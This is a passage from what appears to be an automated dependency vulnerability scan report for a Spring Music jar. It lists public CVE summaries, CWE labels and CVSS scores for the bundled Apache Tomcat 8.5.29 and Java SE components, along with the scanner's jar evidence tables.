af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,MITIGATION,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - MAILING_LIST,MITIGATION,PATCH,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2021-25329 suppress
The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.0) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.0/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.4) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-30640 suppress
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. CWE-116 Improper Encoding or Escaping of Output
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2024-23672 suppress
Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue. CWE-459 Incomplete Cleanup
CVSSv3:
Base Score: MEDIUM (6.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2019-0221 suppress
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-41080 suppress
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-8037 suppress
If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2019-2684 suppress
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - MAILING_LIST,THIRD_PARTY_ADVISORY secalert_us@oracle.com - PATCH,VENDOR_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY secalert_us@oracle.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2021-24122 suppress
When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. CWE-706 Use of Incorrectly-Resolved Name or Reference, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-33037 suppress
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2023-42795 suppress
Incomplete Cleanup vulnerability in Apache Tomcat.When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could
cause Tomcat to skip some parts of the recycling process leading to
information leaking from the current request/response to the next.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue. CWE-459 Incomplete Cleanup
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-45648 suppress
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially
crafted, invalid trailer header could cause Tomcat to treat a single
request as multiple requests leading to the possibility of request
smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue. CWE-20 Improper Input Validation, NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2024-21733 suppress
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2020-1935 suppress
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3:
Base Score: MEDIUM (4.8) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - MAILING_LIST,VENDOR_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-11784 suppress
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2020-13943 suppress
If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-28708 suppress
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.
CWE-523 Unprotected Transport of Credentials
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2021-43980 suppress
The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3:
Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:2.2/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: tomcat-embed-el-8.5.29.jarDescription:
Core Tomcat implementation License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/tomcat-embed-el-8.5.29.jar
MD5: 90ad99f3af6b4486e146395dece7171b
SHA1: 893fb2c87ec1aa248a7911d76c0c06b3fca6bc9b
SHA256: fbcc56e655f22f3c375b0719e08a34cad4289b6b4f79d97da3cb3029ca9f9511
Evidence Type Source Name Value Confidence Vendor central artifactid tomcat-embed-el Highest Vendor central groupid org.apache.tomcat.embed Highest Vendor file name tomcat-embed-el High Vendor jar package name apache Highest Vendor jar package name apache Low Vendor jar package name el Low Vendor Manifest Implementation-Vendor Apache Software Foundation High Vendor Manifest specification-vendor Apache Software Foundation Low Vendor pom artifactid tomcat-embed-el Low Vendor pom groupid org.apache.tomcat.embed Highest Vendor pom url http://tomcat.apache.org/ Highest Product central artifactid tomcat-embed-el Highest Product file name tomcat-embed-el High Product jar package name apache Highest Product jar package name el Low Product Manifest Implementation-Title Apache Tomcat High Product Manifest specification-title Apache Tomcat Medium Product pom artifactid tomcat-embed-el Highest Product pom groupid org.apache.tomcat.embed Highest Product pom url http://tomcat.apache.org/ Medium Version central version 8.5.29 Highest Version file version 8.5.29 High Version Manifest Implementation-Version 8.5.29 High Version pom version 8.5.29 Highest
spring-music-sqldb-1.0.jar: tomcat-embed-websocket-8.5.29.jarDescription:
Core Tomcat implementation License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/tomcat-embed-websocket-8.5.29.jar
MD5: 71d21947758dd569b676b6880540a33b
SHA1: 37786f4ca8a1597a91a0f437e659a76d1fcc5bf1
SHA256: 64b542d14547f8919715e66896af659fdd4b64842f3c566be234fc9170023528
Evidence Type Source Name Value Confidence Vendor central artifactid tomcat-embed-websocket Highest Vendor central groupid org.apache.tomcat.embed Highest Vendor file name tomcat-embed-websocket High Vendor jar package name apache Highest Vendor jar package name apache Low Vendor jar package name tomcat Low Vendor jar package name websocket Low Vendor Manifest Implementation-Vendor Apache Software Foundation High Vendor Manifest specification-vendor Apache Software Foundation Low Vendor pom artifactid tomcat-embed-websocket Low Vendor pom groupid org.apache.tomcat.embed Highest Vendor pom url http://tomcat.apache.org/ Highest Product central artifactid tomcat-embed-websocket Highest Product file name tomcat-embed-websocket High Product jar package name apache Highest Product jar package name tomcat Highest Product jar package name tomcat Low Product jar package name websocket Low Product Manifest Implementation-Title Apache Tomcat High Product Manifest specification-title Apache Tomcat Medium Product pom artifactid tomcat-embed-websocket Highest Product pom groupid org.apache.tomcat.embed Highest Product pom url http://tomcat.apache.org/ Medium Version central version 8.5.29 Highest Version file version 8.5.29 High Version Manifest Implementation-Version 8.5.29 High Version pom version 8.5.29 Highest
CVE-2018-8014 suppress
The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. CWE-1188 Insecure Default Initialization of Resource
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - THIRD_PARTY_ADVISORY,VDB_ENTRY security@apache.org - VENDOR_ADVISORY security@apache.org - VENDOR_ADVISORY security@apache.org - 